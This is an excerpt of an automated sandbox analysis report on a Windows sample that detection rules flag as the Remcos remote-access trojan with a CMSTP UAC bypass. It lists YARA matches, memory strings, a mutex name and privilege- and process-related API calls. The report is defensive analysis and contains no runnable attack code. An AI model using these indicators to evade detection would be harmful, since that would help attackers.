                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004014AB6_2_004014AB
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004051336_2_00405133
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004051A46_2_004051A4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004012466_2_00401246
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_0040CA466_2_0040CA46
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004052356_2_00405235
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004032C86_2_004032C8
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004222D96_2_004222D9
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_004016896_2_00401689
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00402F606_2_00402F60
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 004169A7 appears 87 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 004165FF appears 35 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 00422297 appears 42 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 00401F66 appears 50 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 00433FC0 appears 55 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 004020E7 appears 40 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 0044DB70 appears 41 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 1000A5A6 appears 36 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 1000B100 appears 33 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 00444B5A appears 37 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 004338B5 appears 42 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 00413025 appears 79 times
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: String function: 00416760 appears 69 times
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2142170096.0000000000880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2141868977.0000000003281000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000002.4572439462.000000000287B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2175471606.0000000003343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2142046226.000000000082C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, 00000000.00000003.2147322433.0000000000804000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: OriginalFileName vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeBinary or memory string: OriginalFilename vs 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 4.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 5.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 6.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.0.17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000006.00000000.2148991149.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000000.2113712556.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000005.00000000.2148421587.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000004.00000000.2147746158.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: 17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe PID: 1220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@68/244@15/17
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,4_2_004182CE
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00416AB7
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 6_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,6_2_00410DE1
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 4_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,4_2_00418758
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040E219
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041A64F
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCode function: 0_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BD4
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].jsonJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\fyhstga-ONSWMZ
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeFile created: C:\Users\user\AppData\Local\Temp\TmpUserDataJump to behavior
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Software\0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: fyhstga-ONSWMZ0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Exe0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Exe0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: fyhstga-ONSWMZ0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: 0DG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Inj0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: Inj0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: BG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: BG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: BG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: @CG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: BG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: exepath0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: @CG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: exepath0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: BG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: licence0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: `=G0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: XCG0_2_0040D767
                      Source: C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exeCommand line argument: dCG0_2_0040D767
